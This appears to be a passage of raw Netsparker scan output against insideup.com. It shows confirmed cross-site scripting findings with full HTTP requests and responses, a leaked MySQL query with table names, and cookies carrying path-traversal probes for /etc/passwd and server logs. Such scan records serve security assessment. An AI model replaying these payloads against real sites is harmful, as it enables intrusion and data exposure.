select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/'"--></style></script><script>netsparker(0x0013B9)</script>' OR prj.project_page_url = 'leadflow/css/'"--></style></script><script>netsparker(0x0013B9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/'"--></style></script><script>netsparker(0x0013B9)</script>' OR prj.project_page_url = 'leadflow/css/'"--></style></script><script>netsparker(0x0013B9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/'"--></style></script><script>netsparker(0x0013B9)</script>' OR prj.project_page_url = 'leadflow/css/'"--></style></script><script>netsparker(0x0013B9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/'"--></style></script><script>netsparker(0x0013B9)</script>' OR prj.project_page_url = 'leadflow/css/'"--></style></script><script>netsparker(0x0013B9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/'"--></style></script><script>netsparker(0x0013B9)</script>' OR prj.project_page_url = 'leadflow/css/'"--></style></script><script>netsparker(0x0013B9)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0013B9)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/css/ui.core.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013CA)%3C/script%3E

/ppc/leadflow/css/ui.core.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013CA)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/css/ui.core.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0013CA)</script>

Request

GET /ppc/leadflow/css/ui.core.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0013CA)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:31 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ue00r32cp5la9i19t6fq6hs4g6; path=/
Content-Length: 3033
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/ui.core.css'"--></style></script><script>netsparker(0x0013CA)</script>' OR prj.project_page_url = 'leadflow/css/ui.core.css'"--></style></script><script>netsparker(0x0013CA)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/ui.core.css'"--></style></script><script>netsparker(0x0013CA)</script>' OR prj.project_page_url = 'leadflow/css/ui.core.css'"--></style></script><script>netsparker(0x0013CA)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/ui.core.css'"--></style></script><script>netsparker(0x0013CA)</script>' OR prj.project_page_url = 'leadflow/css/ui.core.css'"--></style></script><script>netsparker(0x0013CA)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/ui.core.css'"--></style></script><script>netsparker(0x0013CA)</script>' OR prj.project_page_url = 'leadflow/css/ui.core.css'"--></style></script><script>netsparker(0x0013CA)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/ui.core.css'"--></style></script><script>netsparker(0x0013CA)</script>' OR prj.project_page_url = 'leadflow/css/ui.core.css'"--></style></script><script>netsparker(0x0013CA)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0013CA)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/css/Dyn_form_style.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013D1)%3C/script%3E

/ppc/leadflow/css/Dyn_form_style.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013D1)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/css/Dyn_form_style.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscri..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0013D1)</script>

Request

GET /ppc/leadflow/css/Dyn_form_style.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0013D1)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:32 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=fabdtlslb15johkh1fkatf3d91; path=/
Content-Length: 3103
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/Dyn_form_style.css'"--></style></script><script>netsparker(0x0013D1)</script>' OR prj.project_page_url = 'leadflow/css/Dyn_form_style.css'"--></style></script><script>netsparker(0x0013D1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/Dyn_form_style.css'"--></style></script><script>netsparker(0x0013D1)</script>' OR prj.project_page_url = 'leadflow/css/Dyn_form_style.css'"--></style></script><script>netsparker(0x0013D1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/Dyn_form_style.css'"--></style></script><script>netsparker(0x0013D1)</script>' OR prj.project_page_url = 'leadflow/css/Dyn_form_style.css'"--></style></script><script>netsparker(0x0013D1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/Dyn_form_style.css'"--></style></script><script>netsparker(0x0013D1)</script>' OR prj.project_page_url = 'leadflow/css/Dyn_form_style.css'"--></style></script><script>netsparker(0x0013D1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/Dyn_form_style.css'"--></style></script><script>netsparker(0x0013D1)</script>' OR prj.project_page_url = 'leadflow/css/Dyn_form_style.css'"--></style></script><script>netsparker(0x0013D1)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0013D1)</script>/' union select prj.catI' at line 5
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
refererUrl POST http://www.insideup.com/index.html
pseudonym POST 3
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST '"--></style></script><script>alert(0x0013D6)</script>
companyName POST Smith
password1 POST 3
password2 POST 3
termsOfService POST 1
receiveSpecialOfferEmail POST 1
x POST 0
y POST 0

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 308
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&pseudonym=3&emailAddress=netsparker%40example.com&firstName=Smith&lastName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0013D6)%3c%2fscript%3e&companyName=Smith&password1=3&password2=3&termsOfService=1&receiveSpecialOfferEmail=1&x=0&y=0

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:33 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=F7C5223AE6BFA5B705E22164ABCBEF59; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option 